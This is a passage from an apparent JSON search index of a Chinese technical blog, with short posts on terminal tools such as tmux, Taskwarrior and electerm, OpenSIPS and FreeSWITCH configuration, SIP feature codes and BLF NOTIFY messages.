rtd=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;recv request=\u0026#34;NOTIFY\u0026#34; crlf=\u0026#34;true\u0026#34; rrs=\u0026#34;true\u0026#34;\u0026gt; \u0026lt;/recv\u0026gt; \u0026lt;send\u0026gt; \u0026lt;!","title":"subscribe场景测试"},{"content":"终端用着用着,光标消失了。\niterm2 仓库issues给出提示,要在设置》高级里面,Use system cursor icons when possible 为 yes.\n然而上面的设置并没有用。\n然后看了superuser上的question, 给出提示, 直接在终端输入 reset , 光标就会出现。解决了问题。\nreset 参考 
https://gitlab.com/gnachman/iterm2/-/issues/6623 https://superuser.com/questions/177377/os-x-terminal-cursor-problem ","permalink":"https://wdd.js.org/posts/2021/04/hh661g/","summary":"终端用着用着,光标消失了。\niterm2 仓库issues给出提示,要在设置》高级里面,Use system cursor icons when possible 为 yes.\n然而上面的设置并没有用。\n然后看了superuser上的question, 给出提示, 直接在终端输入 reset , 光标就会出现。解决了问题。\nreset 参考 https://gitlab.com/gnachman/iterm2/-/issues/6623 https://superuser.com/questions/177377/os-x-terminal-cursor-problem ","title":"iterm2 光标消失了"},{"content":"学习matplotlib绘图时,代码如下,执行过后,图片弹窗没有弹出。\nimport matplotlib.pyplot as plt import matplotlib plt.plot([1.6, 2.7]) plt.show() 并且有下面的报错\ncannot load backend \u0026lsquo;qt5agg\u0026rsquo; which requires the \u0026lsquo;qt5\u0026rsquo; interactive framework, as \u0026lsquo;headless\u0026rsquo; is currently running\n看起来似乎和backend的设置有关。查了些资料,设置了还是不行。\n最后偶然发现,我执行python 都是在tmux里面执行的,如果不在tmux会话里面执行,图片就能正常显示。\n问题从设置backend, 切换到tmux的会话。\n查到sf上正好有相关的问题,可能是在tmux里面PATH环境变量引起的问题。\n问题给的建议是把下面的代码写入.bashrc中,\nIf you\u0026rsquo;re on a Mac and have been wondering why /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin keeps getting prepended to PATH when you run tmux, it\u0026rsquo;s because of a utility called path_helper that\u0026rsquo;s run from your /etc/profile file.\nYou can\u0026rsquo;t easily persuade tmux (or rather, bash) not to source /etc/profile (for some reason tmux always runs as a login shell, which means /etc/profile will be read), but you can make sure that the effects of path_helper don\u0026rsquo;t screw with your PATH.\nThe trick is to make sure that PATH is empty before path_helper runs. In my ~/.bash_profile file I have this:\nif [ -f /etc/profile ]; then PATH=\u0026quot;\u0026quot; source /etc/profile fi\n\u0026gt; Clearing PATH before path_helper executes will prevent it from prepending the default PATH to your (previously) chosen PATH, and will allow the rest of your personal bash setup scripts (commands further down `.bash_profile`, or in `.bashrc` if you\u0026#39;ve sourced it from `.bash_profile`) to setup your PATH accordingly. 
\u0026gt; ```bash if [ -f /etc/profile ]; then PATH=\u0026#34;\u0026#34; source /etc/profile fi cat /etc/profile # 我有这个文件 PATH=\u0026#34;\u0026#34; source /etc/profile 总之,按照sf上的操作,我的问题解决了,图片弹出了。\n参考 https://stackoverflow.com/questions/62423342/python-plot-in-tmux-session-not-showing https://blog.csdn.net/Meditator_hkx/article/details/59106752 https://superuser.com/questions/544989/does-tmux-sort-the-path-variable ","permalink":"https://wdd.js.org/posts/2021/03/pqreg4/","summary":"学习matplotlib绘图时,代码如下,执行过后,图片弹窗没有弹出。\nimport matplotlib.pyplot as plt import matplotlib plt.plot([1.6, 2.7]) plt.show() 并且有下面的报错\ncannot load backend \u0026lsquo;qt5agg\u0026rsquo; which requires the \u0026lsquo;qt5\u0026rsquo; interactive framework, as \u0026lsquo;headless\u0026rsquo; is currently running\n看起来似乎和backend的设置有关。查了些资料,设置了还是不行。\n最后偶然发现,我执行python 都是在tmux里面执行的,如果不在tmux会话里面执行,图片就能正常显示。\n问题从设置backend, 切换到tmux的会话。\n查到sf上正好有相关的问题,可能是在tmux里面PATH环境变量引起的问题。\n问题给的建议是把下面的代码写入.bashrc中,\nIf you\u0026rsquo;re on a Mac and have been wondering why /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin keeps getting prepended to PATH when you run tmux, it\u0026rsquo;s because of a utility called path_helper that\u0026rsquo;s run from your /etc/profile file.\nYou can\u0026rsquo;t easily persuade tmux (or rather, bash) not to source /etc/profile (for some reason tmux always runs as a login shell, which means /etc/profile will be read), but you can make sure that the effects of path_helper don\u0026rsquo;t screw with your PATH.","title":"matplotlib图片弹窗没有弹出"},{"content":"参考 http://coding-geek.com/how-shazam-works/ https://blog.csdn.net/yutianzuijin/article/details/49787551 http://hpac.cs.umu.se/teaching/sem-mus-17/Reports/Froitzheim.pdf 
https://github.com/sfluor/musig ","title":"#shazam算法分析"},{"content":"安装 sudo apt install cmatrix 帮助文档 ➜ ~ cmatrix --help Usage: cmatrix -[abBcfhlsmVx] [-u delay] [-C color] -a: Asynchronous scroll -b: Bold characters on -B: All bold characters (overrides -b) -c: Use Japanese characters as seen in the original matrix. Requires appropriate fonts -f: Force the linux $TERM type to be on -l: Linux mode (uses matrix console font) -L: Lock mode (can be closed from another terminal) -o: Use old-style scrolling -h: Print usage and exit -n: No bold characters (overrides -b and -B, default) -s: \u0026#34;Screensaver\u0026#34; mode, exits on first keystroke -x: X window mode, use if your xterm is using mtx.pcf -V: Print version information and exit -u delay (0 - 10, default 4): Screen update delay -C [color]: Use this color for matrix (default green) -r: rainbow mode -m: lambda mode ","permalink":"https://wdd.js.org/posts/2021/03/fgutiw/","summary":"安装 sudo apt install cmatrix 帮助文档 ➜ ~ cmatrix --help Usage: cmatrix -[abBcfhlsmVx] [-u delay] [-C color] -a: Asynchronous scroll -b: Bold characters on -B: All bold characters (overrides -b) -c: Use Japanese characters as seen in the original matrix. 
Requires appropriate fonts -f: Force the linux $TERM type to be on -l: Linux mode (uses matrix console font) -L: Lock mode (can be closed from another terminal) -o: Use old-style scrolling -h: Print usage and exit -n: No bold characters (overrides -b and -B, default) -s: \u0026#34;Screensaver\u0026#34; mode, exits on first keystroke -x: X window mode, use if your xterm is using mtx.","title":"黑客帝国终端字符瀑布"},{"content":"nb是一个基于命令行的笔记本工具,功能很强大。\n记笔记何须离开终端?\n特点 plain-text data storage, encryption, filtering and search, Git-backed versioning and syncing, Pandoc-backed conversion, global and local notebooks, customizable color themes, extensibility through plugins, 支持各种编辑器打开笔记, 我自然用VIM了。\nA text editor with command line support, such as:Vim,Emacs,Visual Studio Code,Sublime Text,micro,nano,Atom,TextMate,MacDown,some of these,and many of these.\n使用体验截图 参考 https://xwmx.github.io/nb/ https://github.com/xwmx/nb ","permalink":"https://wdd.js.org/posts/2021/03/dtas0p/","summary":"nb是一个基于命令行的笔记本工具,功能很强大。\n记笔记何须离开终端?\n特点 plain-text data storage, encryption, filtering and search, Git-backed versioning and syncing, Pandoc-backed conversion, global and local notebooks, customizable color themes, extensibility through plugins, 支持各种编辑器打开笔记, 我自然用VIM了。\nA text editor with command line support, such as:Vim,Emacs,Visual Studio Code,Sublime Text,micro,nano,Atom,TextMate,MacDown,some of these,and many of these.\n使用体验截图 参考 https://xwmx.github.io/nb/ https://github.com/xwmx/nb ","title":"命令行笔记本 nb 记笔记何须离开终端?"},{"content":"简介 Taskwarrior是命令行下的todolist, 特点是快速高效且功能强大,\n支持项目组 支持燃烧图 支持各种类似SQL的语法过滤 支持各种统计报表 安装 sudo apt-get install taskwarrior 使用说明 增加Todo task add 分机注册测试 due:today Created task 1. 显示TodoList ➜ ~ task list ID Age Due Description Urg 1 5s 2021-03-25 分机注册测试 8.98 开始一个任务 ➜ ~ task 1 start Starting task 1 \u0026#39;分机注册测试\u0026#39;. Started 1 task. ➜ ~ task ls ID A Due Description 1 * 9h 分机注册测试 标记完成一个任务 ➜ ~ task 1 done Completed task 1 \u0026#39;分机注册测试\u0026#39;. Completed 1 task. 
# 任务完成后 task ls将不会显示已经完成的任务 ➜ ~ task ls No matches. # 可以使用task all 查看所有的todolist ➜ ~ task all ID St UUID A Age Done Project Due Description - C 341a0f48 2min 55s 2021-03-25 分机注册测试 燃烧图 # 按天的燃烧图 task burndown.daily # 按月的燃烧图 task burndown.monthly # 按周的燃烧图 task burndown.weekly 日历 task calendar 更多介绍 更多好玩的东西,可以去看看官方的使用说明文档 https://taskwarrior.org/docs/\n参考 https://taskwarrior.org/ 更多命令 https://taskwarrior.org/docs/commands/ ","permalink":"https://wdd.js.org/posts/2021/03/yyz3ca/","summary":"简介 Taskwarrior是命令行下的todolist, 特点是快速高效且功能强大,\n支持项目组 支持燃烧图 支持各种类似SQL的语法过滤 支持各种统计报表 安装 sudo apt-get install taskwarrior 使用说明 增加Todo task add 分机注册测试 due:today Created task 1. 显示TodoList ➜ ~ task list ID Age Due Description Urg 1 5s 2021-03-25 分机注册测试 8.98 开始一个任务 ➜ ~ task 1 start Starting task 1 \u0026#39;分机注册测试\u0026#39;. Started 1 task. ➜ ~ task ls ID A Due Description 1 * 9h 分机注册测试 标记完成一个任务 ➜ ~ task 1 done Completed task 1 \u0026#39;分机注册测试\u0026#39;.","title":"Taskwarrior 命令行下的专业TodoList神器"},{"content":"https://electerm.github.io/electerm/\n功能特点 Work as a terminal/file manager or ssh/sftp client(similar to xshell) Global hotkey to toggle window visibility (simliar to guake, default is ctrl + 2) Multi platform(linux, mac, win) 🇺🇸 🇨🇳 🇧🇷 🇷🇺 🇪🇸 🇫🇷 🇹🇷 🇭🇰 🇯🇵 Support multi-language(electerm-locales, contribute/fix welcome) Double click to directly edit remote file(small ones). Edit local file with built-in editor(small ones). Auth with publickey + password. Zmodem(rz, sz). Transparent window(Mac, win). Terminal background image. Global/session proxy. 
Quick commands Sync bookmarks/themes/quick commands to github/gitee secret gist Serial Port support(removed after version 1.10.14) Quick input to one or all terminal Command line usage: check wiki ","permalink":"https://wdd.js.org/posts/2021/03/tigv1h/","summary":"https://electerm.github.io/electerm/\n功能特点 Work as a terminal/file manager or ssh/sftp client(similar to xshell) Global hotkey to toggle window visibility (simliar to guake, default is ctrl + 2) Multi platform(linux, mac, win) 🇺🇸 🇨🇳 🇧🇷 🇷🇺 🇪🇸 🇫🇷 🇹🇷 🇭🇰 🇯🇵 Support multi-language(electerm-locales, contribute/fix welcome) Double click to directly edit remote file(small ones). Edit local file with built-in editor(small ones). Auth with publickey + password. Zmodem(rz, sz). Transparent window(Mac, win). Terminal background image.","title":"electerm 免费开源跨平台且功能强大的ssh工具"},{"content":"xcode-select --install 参考 https://www.jianshu.com/p/50b6771eb853 ","permalink":"https://wdd.js.org/posts/2021/03/ibv4tb/","summary":"xcode-select --install 参考 https://www.jianshu.com/p/50b6771eb853 ","title":"mac升级后命令行报错 xcrun: error: invalid active developer path"},{"content":"if if (expr) { actions } else { actions; } if (expr) { actions } else if (expr) { actions; } 表达式操作符号 常用的用黄色标记。\n== 等于 != 不等于 =~ 正则匹配 $rU =~ '^1800*' is \u0026ldquo;$rU begins with 1800\u0026rdquo; !~ 正则不匹配 大于\n= 大于等于\n\u0026lt; 小于 \u0026lt;= 小于等于 \u0026amp;\u0026amp; 逻辑与 **|| **逻辑或 **! **逻辑非 [ \u0026hellip; ] - test operator - inside can be any arithmetic expression 其他 除了常见的if语句,opensips还支持switch, while, for each, 因为用的比较少。各位可以看官方文档说明。\nhttps://www.opensips.org/Documentation/Script-Statements-2-4\n","permalink":"https://wdd.js.org/opensips/ch5/statement/","summary":"if if (expr) { actions } else { actions; } if (expr) { actions } else if (expr) { actions; } 表达式操作符号 常用的用黄色标记。\n== 等于 != 不等于 =~ 正则匹配 $rU =~ '^1800*' is \u0026ldquo;$rU begins with 1800\u0026rdquo; !~ 正则不匹配 大于\n= 大于等于\n\u0026lt; 小于 \u0026lt;= 小于等于 \u0026amp;\u0026amp; 逻辑与 **|| **逻辑或 **! 
**逻辑非 [ \u0026hellip; ] - test operator - inside can be any arithmetic expression 其他 除了常见的if语句,opensips还支持switch, while, for each, 因为用的比较少。各位可以看官方文档说明。","title":"常用语句"},{"content":"使用return(int)语句可以返回整数值。\nreturn(0) 相当于exit(), 后续的路由都不再执行 return(正整数) 后续的路由还会继续执行,if测试为true return(负整数) 后续的路由还会继续执行, if测试为false 可以使用 $rc 或者 $retcode 获取上一个路由的返回值 # 请求路由 route{ route(check_is_feature_code); xlog(\u0026#34;check_is_feature_code return code is $rc\u0026#34;); ... ... route(some_other_check); } route[check_is_feature_code]{ if ($rU !~ \u0026#34;^\\*[0-9]+\u0026#34;) { xlog(\u0026#34;check_is_feature_code: is not feature code $rU\u0026#34;); # 非feature code, 提前返回 return(1); } # 下面就是feature code的处理 ...... } route[some_other_check]{ ... } ","permalink":"https://wdd.js.org/opensips/ch5/return/","summary":"使用return(int)语句可以返回整数值。\nreturn(0) 相当于exit(), 后续的路由都不再执行 return(正整数) 后续的路由还会继续执行,if测试为true return(负整数) 后续的路由还会继续执行, if测试为false 可以使用 $rc 或者 $retcode 获取上一个路由的返回值 # 请求路由 route{ route(check_is_feature_code); xlog(\u0026#34;check_is_feature_code return code is $rc\u0026#34;); ... ... route(some_other_check); } route[check_is_feature_code]{ if ($rU !~ \u0026#34;^\\*[0-9]+\u0026#34;) { xlog(\u0026#34;check_is_feature_code: is not feature code $rU\u0026#34;); # 非feature code, 提前返回 return(1); } # 下面就是feature code的处理 ...... } route[some_other_check]{ ... 
} ","title":"使用return语句减少逻辑嵌套"},{"content":"$ru $rU 可读可写以下面的sip URL举例\nsip:8001@test.cc;a=1;b=2 $ru 代表整个sip url就是 sip:8001@test.cc;a=1;b=2 $rU代表用户部分,就是8001 **\n$du 可读可写\n$du = \u0026#34;sip:192.468.2.40\u0026#34;; $du可以理解为外呼代理,我们想让这个请求发到下一个sip服务器,就把$du设置为下一跳的地址。\n","permalink":"https://wdd.js.org/opensips/ch5/core-var/","summary":"$ru $rU 可读可写以下面的sip URL举例\nsip:8001@test.cc;a=1;b=2 $ru 代表整个sip url就是 sip:8001@test.cc;a=1;b=2 $rU代表用户部分,就是8001 **\n$du 可读可写\n$du = \u0026#34;sip:192.468.2.40\u0026#34;; $du可以理解为外呼代理,我们想让这个请求发到下一个sip服务器,就把$du设置为下一跳的地址。","title":"核心变量说明"},{"content":"header部分\n\u0026lt;meta property=\u0026#34;og:image\u0026#34; content=\u0026#34;http://abc.cc/x.jpg\u0026#34; /\u0026gt; body部分\n\u0026lt;div style=\u0026#34;display:none\u0026#34;\u0026gt; \u0026lt;img src=\u0026#34;http://abc.cc/x.jpg\u0026#34;\u0026gt; \u0026lt;/div\u0026gt; 注意,图片的连接,必须是绝对地址。就是格式必需以http开头的地址,不能用相对地址,否则缩略图不会显示。\n","permalink":"https://wdd.js.org/posts/2021/03/rggbsl/","summary":"header部分\n\u0026lt;meta property=\u0026#34;og:image\u0026#34; content=\u0026#34;http://abc.cc/x.jpg\u0026#34; /\u0026gt; body部分\n\u0026lt;div style=\u0026#34;display:none\u0026#34;\u0026gt; \u0026lt;img src=\u0026#34;http://abc.cc/x.jpg\u0026#34;\u0026gt; \u0026lt;/div\u0026gt; 注意,图片的连接,必须是绝对地址。就是格式必需以http开头的地址,不能用相对地址,否则缩略图不会显示。","title":"网页分享到微信添加缩略图"},{"content":"测试目标服务器 http://www.websocket-test.com/, 该服务器使用的是未加密的ws协议。\n打开这个页面,可以看到这个页面发起了连接到ws://121.40.165.18:8800/ 的websocket连接。\n然后看下里面的消息,都是服务端向客户端发送的消息。\n通过wireshark分析\n单独的websocket也是能够看到服务端下发的消息的。\nkeepalive 要点关注 每隔大约45秒,客户端会像服务端发送一个keep alive包。服务端也会非常快的回复一个心跳包 ","permalink":"https://wdd.js.org/network/pz06t2/","summary":"测试目标服务器 http://www.websocket-test.com/, 该服务器使用的是未加密的ws协议。\n打开这个页面,可以看到这个页面发起了连接到ws://121.40.165.18:8800/ 的websocket连接。\n然后看下里面的消息,都是服务端向客户端发送的消息。\n通过wireshark分析\n单独的websocket也是能够看到服务端下发的消息的。\nkeepalive 要点关注 每隔大约45秒,客户端会像服务端发送一个keep alive包。服务端也会非常快的回复一个心跳包 ","title":"websocket tcp keepalive 机制调研"},{"content":"功能描述 
用户可以拨打一个特殊的号码,用来触发特定的功能。常见的功能码一般以 * 开头,例如\n*1 组内代接 *1(EXT) 代接指定的分机 *2 呼叫转移 **87 请勿打扰 \u0026hellip; 上面的栗子,具体的功能码,对应的业务逻辑是可配置的。\n场景举例 我的分机是8001,我看到8008的分机正在振铃,此时我需要把电话接起来。但是我不能走到8008的工位上去接电话,我必须要在自己的工位上接电话。\n那么我在自己的分机上输入*18008 这时SIP服务端就知道你想代8008接听正在振铃的电话。\n说起来功能码就是一种使用话机上按键的一组暗号。\n话机上一般只有0-9*#,一共12个按键。没办法用其他的编码告诉服务端自己想做什么,所以只能用功能码。\n参考 https://www.ipcomms.net/support/myoffice-pbx/feature-codes https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/admin/configuration/manual/cmeadm/cmefacs.pdf https://help.yeastar.com/en/s-series/topic/feature_code.html?hl=feature%2Ccode\u0026amp;_ga=2.76562834.622619423.1615949948-1155631884.1615949948 ","permalink":"https://wdd.js.org/opensips/ch9/feature-code/","summary":"功能描述 用户可以拨打一个特殊的号码,用来触发特定的功能。常见的功能码一般以 * 开头,例如\n*1 组内代接 *1(EXT) 代接指定的分机 *2 呼叫转移 **87 请勿打扰 \u0026hellip; 上面的栗子,具体的功能码,对应的业务逻辑是可配置的。\n场景举例 我的分机是8001,我看到8008的分机正在振铃,此时我需要把电话接起来。但是我不能走到8008的工位上去接电话,我必须要在自己的工位上接电话。\n那么我在自己的分机上输入*18008 这时SIP服务端就知道你想代8008接听正在振铃的电话。\n说起来功能码就是一种使用话机上按键的一组暗号。\n话机上一般只有0-9*#,一共12个按键。没办法用其他的编码告诉服务端自己想做什么,所以只能用功能码。\n参考 https://www.ipcomms.net/support/myoffice-pbx/feature-codes https://www.cisco.com/c/en/us/td/docs/voice_ip_comm/cucme/admin/configuration/manual/cmeadm/cmefacs.pdf https://help.yeastar.com/en/s-series/topic/feature_code.html?hl=feature%2Ccode\u0026amp;_ga=2.76562834.622619423.1615949948-1155631884.1615949948 ","title":"SIP feature codes SIP功能码"},{"content":"FS的 call pickup功能,就是用intercept功能。\n一个呼叫一般有两个leg, intercept一般是把自己bridge其中一个leg,另外一个leg会挂断。 intercept默认是bridge legA, 挂断legB。通过参数也可以指定来bridge legB,挂断legA。\n从一个简单的场景说起。A拨打B分机。\n从FS的角度来说,有以下两条腿。\n通过分析日志可以发现:具有replaces这种头的invite,fs没有走路由,而是直接用了intercept拦截。\nNew Channel sofia/external/8003@wdd.cc [6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1]2021-03-15 10:42:47.380797 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8001@wdd.cc [34dc4095-3bac-4f7d-8be4-1ed5ed2f06b4]\n2021-03-15 10:42:51.520800 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8004@wdd.cc 
[03e78837-1413-4b77-ba4c-e753fed55ebe]2021-03-15 10:42:51.520800 [DEBUG] switch_core_state_machine.c:585 (sofia/external/8004@wdd.cc) Running State Change CS_NEW (Cur 3 Tot 163)2021-03-15 10:42:51.520800 [DEBUG] sofia.c:10279 sofia/external/8004@wdd.cc receiving invite from 192.168.2.109:18627 version: 1.10.3-release 32bit2021-03-15 10:42:51.520800 [DEBUG] sofia.c:11640 call 6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1 intercepted2021-03-15 10:42:51.520800 [DEBUG] sofia.c:7325 Channel sofia/external/8004@wdd.cc entering state [received][100]\nEXECUTE [depth=0] sofia/external/8004@wdd.cc intercept(6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1)\n常见的使用场景:\n某个电话正在振铃,但是没人接。如果我的话机通过BLF监控了这个分机,就可以通过按键来用我自己的话机代接正在振铃的话机。 参考 https://www.yuque.com/wangdd/fyikfz/lawr6v https://www.yuque.com/wangdd/fyikfz/lawr6v ","permalink":"https://wdd.js.org/freeswitch/intercept/","summary":"FS的 call pickup功能,就是用intercept功能。\n一个呼叫一般有两个leg, intercept一般是把自己bridge其中一个leg,另外一个leg会挂断。 intercept默认是bridge legA, 挂断legB。通过参数也可以指定来bridge legB,挂断legA。\n从一个简单的场景说起。A拨打B分机。\n从FS的角度来说,有以下两条腿。\n通过分析日志可以发现:具有replaces这种头的invite,fs没有走路由,而是直接用了intercept拦截。\nNew Channel sofia/external/8003@wdd.cc [6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1]2021-03-15 10:42:47.380797 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8001@wdd.cc [34dc4095-3bac-4f7d-8be4-1ed5ed2f06b4]\n2021-03-15 10:42:51.520800 [NOTICE] switch_channel.c:1118 New Channel sofia/external/8004@wdd.cc [03e78837-1413-4b77-ba4c-e753fed55ebe]2021-03-15 10:42:51.520800 [DEBUG] switch_core_state_machine.c:585 (sofia/external/8004@wdd.cc) Running State Change CS_NEW (Cur 3 Tot 163)2021-03-15 10:42:51.520800 [DEBUG] sofia.c:10279 sofia/external/8004@wdd.cc receiving invite from 192.168.2.109:18627 version: 1.10.3-release 32bit2021-03-15 10:42:51.520800 [DEBUG] sofia.c:11640 call 6ca5ed94-a5e5-492d-aaf7-782cecbaf7d1 intercepted2021-03-15 10:42:51.520800 [DEBUG] sofia.c:7325 Channel sofia/external/8004@wdd.cc entering state [received][100]\nEXECUTE [depth=0] 
sofia/external/8004@wdd.","title":"FS intercept拦截"},{"content":"rfc http://www.rfcreader.com/\nrfcreader是一个在线的网站,可以阅读和搜索rfc文档。\n另外也具有一些非常好用的功能\n支持账号登录,收藏自己喜欢的rfc文档 可以对rfc进行标记,评论。 有良好的目录 支持书签 等等。。。。 ","permalink":"https://wdd.js.org/posts/2021/03/mcbqod/","summary":"rfc http://www.rfcreader.com/\nrfcreader是一个在线的网站,可以阅读和搜索rfc文档。\n另外也具有一些非常好用的功能\n支持账号登录,收藏自己喜欢的rfc文档 可以对rfc进行标记,评论。 有良好的目录 支持书签 等等。。。。 ","title":"RFC阅读神器 rfcreader"},{"content":"参考: https://github.com/gpakosz/.tmux\n优点:\n界面非常漂亮,有很多指示图标,能够实时的查看系统状态,session和window信息 快捷键非常合理,非常好用 cd git clone https://gitee.com/wangduanduan/tmux.git mv tmux .tmux ln -s -f .tmux/.tmux.conf cp .tmux/.tmux.conf.local . 微调配置 启用ctrl+a光标定位到行首 默认情况下,ctrl+a被配置成和ctrl+b的功能相同,但是大多数场景下,ctrl+a是readline的光标回到行首的快捷键,\n所以我们需要恢复ctrl+a的原有功能。\n只需要把下面的两行取消注释\nset -gu prefix2 unbind C-a 复制模式支持jk上下移动 set -g mode-keys vi 在相同的目录打开新的窗口或者标签页 tmux_conf_new_window_retain_current_path=true tmux_conf_new_pane_retain_current_path=true 隐藏系统运行时间信息 状态栏的系统运行时长似乎没什么用,可以隐藏\ntmux_conf_theme_status_left=\u0026#34; ❐ #S \u0026#34; ","permalink":"https://wdd.js.org/posts/2021/03/yroxga/","summary":"参考: https://github.com/gpakosz/.tmux\n优点:\n界面非常漂亮,有很多指示图标,能够实时的查看系统状态,session和window信息 快捷键非常合理,非常好用 cd git clone https://gitee.com/wangduanduan/tmux.git mv tmux .tmux ln -s -f .tmux/.tmux.conf cp .tmux/.tmux.conf.local . 
微调配置 启用ctrl+a光标定位到行首 默认情况下,ctrl+a被配置成和ctrl+b的功能相同,但是大多数场景下,ctrl+a是readline的光标回到行首的快捷键,\n所以我们需要恢复ctrl+a的原有功能。\n只需要把下面的两行取消注释\nset -gu prefix2 unbind C-a 复制模式支持jk上下移动 set -g mode-keys vi 在相同的目录打开新的窗口或者标签页 tmux_conf_new_window_retain_current_path=true tmux_conf_new_pane_retain_current_path=true 隐藏系统运行时间信息 状态栏的系统运行时长似乎没什么用,可以隐藏\ntmux_conf_theme_status_left=\u0026#34; ❐ #S \u0026#34; ","title":"oh my tmux tmux的高级定制"},{"content":"BLF功能简介 BLF是busy lamp field的缩写。一句话介绍就是,一个分机可以监控另一个分机的呼叫状态,状态可以通过分机上的指示灯来表示。\n例如:分机A通过配置过后,监控了分机B。\n如果分机B没有通话,那么分机A上的指示灯显示绿色 如果分机B上有一个呼叫正在振铃,那么分机A指示灯红色灯闪烁 如果分机B正在打电话,那么分机A的指示灯显示红色 这个功能的使用场景往往是例如秘书B监控了老板A的话机,在秘书把电话转给老板之前,可以通过自己电话上的指示灯,来判断老板有没有在打电话,如果没有在打电话,才可以把电话转过去。\n信令实现逻辑 信令分析 空闲通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKfef7.27d86e6.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: \u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 1 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 140 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=120 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34; encoding=\u0026#34;utf-8\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;0\u0026#34; state=\u0026#34;full\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34;\u0026gt;\u0026lt;/dialog-info\u0026gt; 通话通知 NOTIFY sip:8003@192.168.2.109:5060 SIP/2.0 Via: SIP/2.0/UDP 192.168.2.109:18627;branch=z9hG4bKcef7.91c1e716.0 To: \u0026lt;sip:8003@wdd.cc\u0026gt;;tag=1 From: 
\u0026lt;sip:9999@wdd.cc\u0026gt;;tag=d009-12c2f272e7622c1cd9b6aa285a7b9736 CSeq: 2 NOTIFY Call-ID: 1-774753@127.0.1.1 Route: \u0026lt;sip:192.168.2.109:19666;ftag=1;lr\u0026gt; Max-Forwards: 70 Content-Length: 466 User-Agent:WMS Event: dialog Contact: \u0026lt;sip:core@192.168.2.109:18627\u0026gt; Subscription-State: active;expires=108 Content-Type: application/dialog-info+xml \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt;\u0026lt;dialog id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; call-id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt;\u0026lt;state\u0026gt;confirmed\u0026lt;/state\u0026gt;\u0026lt;remote\u0026gt;\u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:8001@wdd.cc\u0026#34;/\u0026gt;\u0026lt;/remote\u0026gt;\u0026lt;local\u0026gt;\u0026lt;identity\u0026gt;sip:9999@wdd.cc\u0026lt;/identity\u0026gt;\u0026lt;target uri=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt;\u0026lt;/local\u0026gt;\u0026lt;/dialog\u0026gt;\u0026lt;/dialog-info\u0026gt; \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:9999@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt; \u0026lt;dialog id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; call-id=\u0026#34;dSY.1nmnTyMLGx-qR3pCvNHbvKgxtp9N\u0026#34; direction=\u0026#34;recipient\u0026#34;\u0026gt; \u0026lt;state\u0026gt;confirmed\u0026lt;/state\u0026gt; \u0026lt;remote\u0026gt; \u0026lt;identity\u0026gt;sip:8001@wdd.cc\u0026lt;/identity\u0026gt; \u0026lt;target uri=\u0026#34;sip:8001@wdd.cc\u0026#34;/\u0026gt; \u0026lt;/remote\u0026gt; \u0026lt;local\u0026gt; 
\u0026lt;identity\u0026gt;sip:9999@wdd.cc\u0026lt;/identity\u0026gt; \u0026lt;target uri=\u0026#34;sip:9999@wdd.cc\u0026#34;/\u0026gt; \u0026lt;/local\u0026gt; \u0026lt;/dialog\u0026gt; \u0026lt;/dialog-info\u0026gt; 请求体的格式说明参见:https://tools.ietf.org/html/rfc4235#section-4\n挂断Body \u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;dialog-info xmlns=\u0026#34;urn:ietf:params:xml:ns:dialog-info\u0026#34; version=\u0026#34;1\u0026#34; entity=\u0026#34;sip:8001@wdd.cc\u0026#34; state=\u0026#34;partial\u0026#34;\u0026gt;\u0026lt;dialog id=\u0026#34;45f1115c-fc32-1239-7198-b827 6c4366\u0026#34; call-id=\u0026#34;45f1115c-fc32-1239-7198-b827eb6c4366\u0026#34; 